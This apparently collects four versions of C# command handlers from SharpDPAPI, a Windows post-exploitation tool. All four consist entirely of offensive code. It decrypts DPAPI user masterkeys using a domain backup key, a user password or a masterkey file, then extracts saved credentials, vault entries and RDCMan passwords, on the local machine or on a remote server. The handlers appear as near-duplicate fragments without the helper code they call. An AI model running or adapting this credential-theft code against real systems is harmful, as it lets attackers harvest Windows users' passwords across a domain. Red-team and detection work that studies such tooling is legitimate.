public void Execute(Dictionary <string, string> arguments) { Console.WriteLine("\r\n[*] Action: User DPAPI Credential and Vault Triage\r\n"); arguments.Remove("triage"); string server = ""; // used for remote server specification if (arguments.ContainsKey("/server")) { server = arguments["/server"]; Console.WriteLine("[*] Triaging remote server: {0}\r\n", server); } // {GUID}:SHA1 keys are the only ones that don't start with / Dictionary <string, string> masterkeys = new Dictionary <string, string>(); foreach (KeyValuePair <string, string> entry in arguments) { if (!entry.Key.StartsWith("/")) { masterkeys.Add(entry.Key, entry.Value); } } if (arguments.ContainsKey("/pvk")) { // use a domain DPAPI backup key to triage masterkeys masterkeys = SharpDPAPI.Dpapi.PVKTriage(arguments); } else if (arguments.ContainsKey("/mkfile")) { masterkeys = SharpDPAPI.Helpers.ParseMasterKeyFile(arguments["/mkfile"]); } else if (arguments.ContainsKey("/password")) { string password = arguments["/password"]; Console.WriteLine("[*] Will decrypt user masterkeys with password: {0}\r\n", password); masterkeys = Triage.TriageUserMasterKeysWithPass(password); } if (arguments.ContainsKey("/server") && !arguments.ContainsKey("/pvk")) { Console.WriteLine("[X] The '/server:X' argument must be used with '/pvk:BASE64...' !"); } else { Triage.TriageUserCreds(masterkeys, server); Triage.TriageUserVaults(masterkeys, server); Console.WriteLine(); if (masterkeys.Count == 0) { // try to use CryptUnprotectData if no GUID lookups supplied Triage.TriageRDCMan(masterkeys, server, true); } else { Triage.TriageRDCMan(masterkeys, server, false); } } }
public void Execute(Dictionary <string, string> arguments) { Console.WriteLine("\r\n[*] Action: User DPAPI Credential Triage\r\n"); arguments.Remove("credentials"); if (arguments.ContainsKey("/target")) { string target = arguments["/target"]; arguments.Remove("/target"); if (arguments.ContainsKey("/pvk")) { // using a domain backup key to decrypt everything string pvk64 = arguments["/pvk"]; byte[] backupKeyBytes; if (File.Exists(pvk64)) { backupKeyBytes = File.ReadAllBytes(pvk64); } else { backupKeyBytes = Convert.FromBase64String(pvk64); } // build a {GUID}:SHA1 masterkey mappings Dictionary <string, string> mappings = Triage.TriageUserMasterKeys(backupKeyBytes, false); if (mappings.Count == 0) { Console.WriteLine("\r\n[!] No master keys decrypted!\r\n"); } else { Console.WriteLine("\r\n[*] User master key cache:\r\n"); foreach (KeyValuePair <string, string> kvp in mappings) { Console.WriteLine("{0}:{1}", kvp.Key, kvp.Value); } } Console.WriteLine("\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n"); arguments = mappings; } if (File.Exists(target)) { Console.WriteLine("[*] Target Credential File: {0}\r\n", target); Triage.TriageCredFile(target, arguments); } else if (Directory.Exists(target)) { Console.WriteLine("[*] Target Credential Folder: {0}\r\n", target); Triage.TriageCredFolder(target, arguments); } else { Console.WriteLine("\r\n[X] '{0}' is not a valid file or directory.", target); } } else if (arguments.ContainsKey("/pvk")) { // using a domain backup key to decrypt everything string pvk64 = arguments["/pvk"]; string server = ""; byte[] backupKeyBytes; if (File.Exists(pvk64)) { backupKeyBytes = File.ReadAllBytes(pvk64); } else { backupKeyBytes = Convert.FromBase64String(pvk64); } Console.WriteLine("[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!"); // build a {GUID}:SHA1 masterkey mappings Dictionary <string, string> mappings = new Dictionary <string, string>(); if (arguments.ContainsKey("/server")) { server = arguments["/server"]; Console.WriteLine("[*] Triaging remote server: {0}\r\n", server); mappings = Triage.TriageUserMasterKeys(backupKeyBytes, false, server); } else { Console.WriteLine(""); mappings = Triage.TriageUserMasterKeys(backupKeyBytes, false); } if (mappings.Count == 0) { Console.WriteLine("[!] No master keys decrypted!\r\n"); } else { Console.WriteLine("[*] User master key cache:\r\n"); foreach (KeyValuePair <string, string> kvp in mappings) { Console.WriteLine("{0}:{1}", kvp.Key, kvp.Value); } Console.WriteLine(); } Triage.TriageUserCreds(mappings, server); } else { if (arguments.ContainsKey("/server")) { Console.WriteLine("[X] The '/server:X' argument must be used with '/pvk:BASE64...' !"); } else { Triage.TriageUserCreds(arguments); } } }
public void Execute(Dictionary <string, string> arguments) { Console.WriteLine("\r\n[*] Action: User DPAPI Credential and Vault Triage\r\n"); arguments.Remove("triage"); string server = ""; if (arguments.ContainsKey("/pvk")) { // using a domain backup key to decrypt everything string pvk64 = arguments["/pvk"]; byte[] backupKeyBytes = Convert.FromBase64String(pvk64); Console.WriteLine("[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!"); // build a {GUID}:SHA1 masterkey mappings Dictionary <string, string> mappings = new Dictionary <string, string>(); if (arguments.ContainsKey("/server")) { server = arguments["/server"]; Console.WriteLine("[*] Triaging remote server: {0}\r\n", server); mappings = Triage.TriageUserMasterKeys(backupKeyBytes, false, server); } else { Console.WriteLine(""); mappings = Triage.TriageUserMasterKeys(backupKeyBytes, false); } if (mappings.Count == 0) { Console.WriteLine("[!] No master keys decrypted!\r\n"); } else { Console.WriteLine("[*] Master key cache:\r\n"); foreach (KeyValuePair <string, string> kvp in mappings) { Console.WriteLine("{0}:{1}", kvp.Key, kvp.Value); } Console.WriteLine(); } Triage.TriageUserCreds(mappings, server); Triage.TriageUserVaults(mappings); return; } else { if (arguments.ContainsKey("/server")) { Console.WriteLine("[X] The '/server:X' argument must be used with '/pvk:BASE64...' !"); return; } else { Triage.TriageUserCreds(arguments); Triage.TriageUserVaults(arguments); } } }
public void Execute(Dictionary <string, string> arguments) { Console.WriteLine("\r\n[*] Action: User DPAPI Credential Triage\r\n"); arguments.Remove("credentials"); Dictionary <string, string> masterkeys = new Dictionary <string, string>(); string server = ""; // used for remote server specification if (arguments.ContainsKey("/server")) { server = arguments["/server"]; Console.WriteLine("[*] Triaging remote server: {0}\r\n", server); } // {GUID}:SHA1 keys are the only ones that don't start with / foreach (KeyValuePair <string, string> entry in arguments) { if (!entry.Key.StartsWith("/")) { masterkeys.Add(entry.Key, entry.Value); } } if (arguments.ContainsKey("/pvk")) { // use a domain DPAPI backup key to triage masterkeys masterkeys = SharpDPAPI.Dpapi.PVKTriage(arguments); } else if (arguments.ContainsKey("/mkfile")) { masterkeys = SharpDPAPI.Helpers.ParseMasterKeyFile(arguments["/mkfile"]); } else if (arguments.ContainsKey("/password")) { string password = arguments["/password"]; Console.WriteLine("[*] Will decrypt user masterkeys with password: {0}\r\n", password); if (arguments.ContainsKey("/server")) { masterkeys = Triage.TriageUserMasterKeys(null, true, arguments["/server"], password); } else { masterkeys = Triage.TriageUserMasterKeys(null, true, "", password); } } if (arguments.ContainsKey("/target")) { string target = arguments["/target"].Trim('"').Trim('\''); if (File.Exists(target)) { Console.WriteLine("[*] Target Credential File: {0}\r\n", target); Triage.TriageCredFile(target, masterkeys); } else if (Directory.Exists(target)) { Console.WriteLine("[*] Target Credential Folder: {0}\r\n", target); Triage.TriageCredFolder(target, masterkeys); } else { Console.WriteLine("\r\n[X] '{0}' is not a valid file or directory.", target); } } else { if (arguments.ContainsKey("/server") && !arguments.ContainsKey("/pvk") && !arguments.ContainsKey("/password")) { Console.WriteLine("[X] The '/server:X' argument must be used with '/pvk:BASE64...' or '/password:X' !"); } else { Triage.TriageUserCreds(masterkeys, server); } } }